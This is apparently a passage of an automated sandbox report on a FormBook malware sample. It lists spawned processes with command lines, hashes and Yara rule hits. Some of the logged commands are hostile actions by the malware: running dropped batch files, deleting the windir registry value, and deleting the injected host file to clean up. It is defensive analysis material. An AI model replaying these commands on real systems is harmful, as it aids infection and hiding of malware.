                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:moderate

                                                                                Analysis Process: cmd.exe PID: 1808 Parent PID: 6840

                                                                                General

                                                                                Start time:16:15:39
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                                                                Imagebase:0x2a0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 5768 Parent PID: 1808

                                                                                General

                                                                                Start time:16:15:39
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: cmd.exe PID: 4528 Parent PID: 1808

                                                                                General

                                                                                Start time:16:15:39
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                                                                Imagebase:0x2a0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 5784

                                                                                General

                                                                                Start time:16:15:40
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                Imagebase:0x7ff6f22f0000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 6192 Parent PID: 4528

                                                                                General

                                                                                Start time:16:15:40
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: cmd.exe PID: 2244 Parent PID: 6840

                                                                                General

                                                                                Start time:16:15:40
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                                                                                Imagebase:0x2a0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: conhost.exe PID: 2424 Parent PID: 2244

                                                                                General

                                                                                Start time:16:15:41
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: reg.exe PID: 6200 Parent PID: 2244

                                                                                General

                                                                                Start time:16:15:41
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:reg delete hkcu\Environment /v windir /f
                                                                                Imagebase:0xd60000
                                                                                File size:59392 bytes
                                                                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: conhost.exe PID: 6228 Parent PID: 6200

                                                                                General

                                                                                Start time:16:15:42
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: Fdhlajk.exe PID: 6148 Parent PID: 3440

                                                                                General

                                                                                Start time:16:15:46
                                                                                Start date:03/08/2021
                                                                                Path:C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
                                                                                Imagebase:0x400000
                                                                                File size:702464 bytes
                                                                                MD5 hash:811EA41E60760A97B5F28973618728FE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Yara matches:
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000010.00000003.437534855.0000000002DA8000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                Antivirus matches:
                                                                                • Detection: 20%, ReversingLabs

                                                                                Analysis Process: Fdhlajk.exe PID: 6496 Parent PID: 3440

                                                                                General

                                                                                Start time:16:15:54
                                                                                Start date:03/08/2021
                                                                                Path:C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
                                                                                Imagebase:0x400000
                                                                                File size:702464 bytes
                                                                                MD5 hash:811EA41E60760A97B5F28973618728FE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Yara matches:
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000013.00000003.465981030.0000000002DA8000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000013.00000003.465812677.0000000002DE4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)

                                                                                Analysis Process: mshta.exe PID: 5732 Parent PID: 6148

                                                                                General

                                                                                Start time:16:16:18
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\System32\mshta.exe
                                                                                Imagebase:0x2d0000
                                                                                File size:13312 bytes
                                                                                MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                Analysis Process: rundll32.exe PID: 6200 Parent PID: 3440

                                                                                General

                                                                                Start time:16:16:26
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                Imagebase:0xce0000
                                                                                File size:61952 bytes
                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                Analysis Process: secinit.exe PID: 6044 Parent PID: 6496

                                                                                General

                                                                                Start time:16:16:30
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\secinit.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\System32\secinit.exe
                                                                                Imagebase:0xa70000
                                                                                File size:9728 bytes
                                                                                MD5 hash:174A363BB5A2D88B224546C15DD10906
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                Analysis Process: autoconv.exe PID: 6412 Parent PID: 3440

                                                                                General

                                                                                Start time:16:16:31
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                Imagebase:0x970000
                                                                                File size:851968 bytes
                                                                                MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: cmd.exe PID: 6324 Parent PID: 6200

                                                                                General

                                                                                Start time:16:16:32
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:/c del 'C:\Windows\SysWOW64\mshta.exe'
                                                                                Imagebase:0x2a0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: conhost.exe PID: 6344 Parent PID: 6324

                                                                                General

                                                                                Start time:16:16:33
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: autoconv.exe PID: 6416 Parent PID: 3440

                                                                                General

                                                                                Start time:16:16:33
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                Imagebase:0x970000
                                                                                File size:851968 bytes
                                                                                MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: autoconv.exe PID: 6680 Parent PID: 3440

                                                                                General

                                                                                Start time:16:16:34
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                Imagebase:0x970000
                                                                                File size:851968 bytes
                                                                                MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: NETSTAT.EXE PID: 2408 Parent PID: 3440

                                                                                General

                                                                                Start time:16:16:35
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                Imagebase:0x260000
                                                                                File size:32768 bytes
                                                                                MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >